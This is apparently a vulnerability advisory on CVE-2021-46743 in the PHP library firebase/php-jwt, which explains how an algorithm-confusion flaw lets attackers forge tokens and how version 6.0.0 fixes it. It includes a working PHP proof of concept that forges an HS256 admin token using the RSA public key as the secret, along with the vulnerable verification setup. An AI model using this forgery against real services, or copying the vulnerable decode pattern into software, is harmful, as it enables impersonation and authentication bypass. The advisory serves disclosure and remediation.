Intel

CVE-2021-46743

firebase/php-jwt is vulnerable to Access Restriction Bypass

Access Restriction Bypass Pre-CVE
Found by Aikido Intel before public disclosure or CVE publication.

91

Critical Risk

This Affects:

firebase/php-jwt

TL;DR

firebase/php-jwt is a popular PHP library that generates and validates JWTs (JSON Web Tokens). The flaw is confined to the validation side of the library (JWT::decode()); token generation is not affected. Successful exploitation lets an attacker forge arbitrary JWTs and thereby impersonate any user on your platform, which bypasses even 2FA wherever the JWT is the credential that is trusted after login.

Who does this affect?

You are only affected if your app verifies tokens with more than one type of key, namely an asymmetric key for RS256 and a shared secret for HS256, and calls JWT::decode() with an array of keys while allowing both algorithms, like this: JWT::decode( $token, [ array holding at least both key types, selected by the token's kid header ], [ 'RS256', 'HS256' ] ); The library picks the key by kid but does not tie that key to an algorithm, so a token whose alg header says HS256 is HMAC-verified with whatever key kid selects, including an RSA public key that the attacker already knows. If you pass only one algorithm as the third parameter, you are not affected.
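The affected pattern end to end, as an added example that is not part of the advisory or of the php-jwt project's own code. It assumes a Composer install of a vulnerable 5.x release of firebase/php-jwt and generates a throwaway RSA key pair and HMAC secret inline (constructed for the demo; a real deployment would load them from configuration). The key IDs 'rsa-2021' and 'hmac-app' are invented names.

```php
<?php
// Added example, not from the advisory or from firebase/php-jwt itself.
// Assumes: composer require firebase/php-jwt:^5 (a vulnerable release).
require __DIR__ . '/vendor/autoload.php';

use Firebase\JWT\JWT;

// Constructed demo material: a fresh RSA key pair and a random HMAC secret.
// In production the public half of the RSA key is usually published (JWKS),
// so an attacker is assumed to have it.
$rsa = openssl_pkey_new([
    'private_key_bits' => 2048,
    'private_key_type' => OPENSSL_KEYTYPE_RSA,
]);
openssl_pkey_export($rsa, $rsaPrivatePem);
$rsaPublicPem = openssl_pkey_get_details($rsa)['key'];
$hmacSecret   = random_bytes(32);

// The affected verification setup: two key types in one map, selected by the
// token's kid header, and both algorithms allowed. Nothing in this map records
// which algorithm each key is meant for.
$keys = [
    'rsa-2021' => $rsaPublicPem,   // intended for RS256
    'hmac-app' => $hmacSecret,     // intended for HS256
];
$allowedAlgs = ['RS256', 'HS256'];

// Attacker side: build an HS256 token whose HMAC secret is the RSA public key,
// and point kid at the RSA entry. JWT::encode is just a convenient HMAC signer here.
$forged = JWT::encode(
    ['sub' => 'admin', 'exp' => time() + 3600],
    $rsaPublicPem,
    'HS256',
    'rsa-2021'
);

// Server side on 5.x: kid selects the public key, alg=HS256 is in the allow-list,
// and the library HMAC-verifies the signature with the public key string. Because
// the attacker used the same string as the secret, verification succeeds.
$claims = JWT::decode($forged, $keys, $allowedAlgs);
var_dump($claims);
```

On a vulnerable version the decode() call returns the attacker-chosen claims instead of throwing; with the third parameter reduced to a single algorithm ('RS256' only for this key map) the same token is refused with an "Algorithm not allowed" exception before any signature check runs.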

Background info

firebase/php-jwt is vulnerable to Access Restriction Bypass in versions < 6.0.0.

How to fix this

Pass only one algorithm as the third parameter of JWT::decode() (if you genuinely need both RS256 and HS256, verify them in two separate code paths, each with a single allowed algorithm and only the keys for that algorithm). If that refactor is not practical, you must upgrade to version 6.0.0 or later. Note that 6.0.0 is a breaking change: decode() no longer takes an allowed-algorithms array and instead expects Firebase\JWT\Key objects, each binding one key to exactly one algorithm, and it rejects any token whose alg header does not match the algorithm of the key selected by kid.
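The fixed form of the same setup, as an added example that is not part of the advisory or of the php-jwt project's own code. It assumes a Composer install of firebase/php-jwt 6.0.0 or later, generates the demo key material inline (constructed for the demo), and reuses the invented key IDs 'rsa-2021' and 'hmac-app' from the vulnerable pattern above.

```php
<?php
// Added example, not from the advisory or from firebase/php-jwt itself.
// Assumes: composer require firebase/php-jwt:^6 (fixed release).
require __DIR__ . '/vendor/autoload.php';

use Firebase\JWT\JWT;
use Firebase\JWT\Key;

// Constructed demo material, as in the vulnerable example.
$rsa = openssl_pkey_new([
    'private_key_bits' => 2048,
    'private_key_type' => OPENSSL_KEYTYPE_RSA,
]);
openssl_pkey_export($rsa, $rsaPrivatePem);
$rsaPublicPem = openssl_pkey_get_details($rsa)['key'];
$hmacSecret   = random_bytes(32);

// 6.x: each entry is a Key that carries the one algorithm it may verify.
// There is no separate allowed-algorithms list any more.
$keys = [
    'rsa-2021' => new Key($rsaPublicPem, 'RS256'),
    'hmac-app' => new Key($hmacSecret, 'HS256'),
];

// A legitimate RS256 token issued with the private key still verifies.
$legit = JWT::encode(
    ['sub' => 'alice', 'exp' => time() + 3600],
    $rsaPrivatePem,
    'RS256',
    'rsa-2021'
);
$claims = JWT::decode($legit, $keys);
echo "legitimate token accepted for sub=" . $claims->sub . "\n";

// The forgery from the vulnerable pattern: HS256 with the public key as the HMAC
// secret, kid pointing at the RSA entry.
$forged = JWT::encode(
    ['sub' => 'admin', 'exp' => time() + 3600],
    $rsaPublicPem,
    'HS256',
    'rsa-2021'
);

try {
    JWT::decode($forged, $keys);
    echo "forged token accepted (this must not happen on >= 6.0.0)\n";
} catch (\UnexpectedValueException $e) {
    // 6.x compares the token's alg header with the selected Key's algorithm
    // before any signature check, so the HS256 header is rejected outright.
    echo "forged token rejected: " . $e->getMessage() . "\n";
}
```

The design point is that key selection and algorithm selection are no longer independent inputs: once the kid header has chosen 'rsa-2021', the only algorithm that key will ever be used with is RS256, regardless of what the attacker writes in the token header.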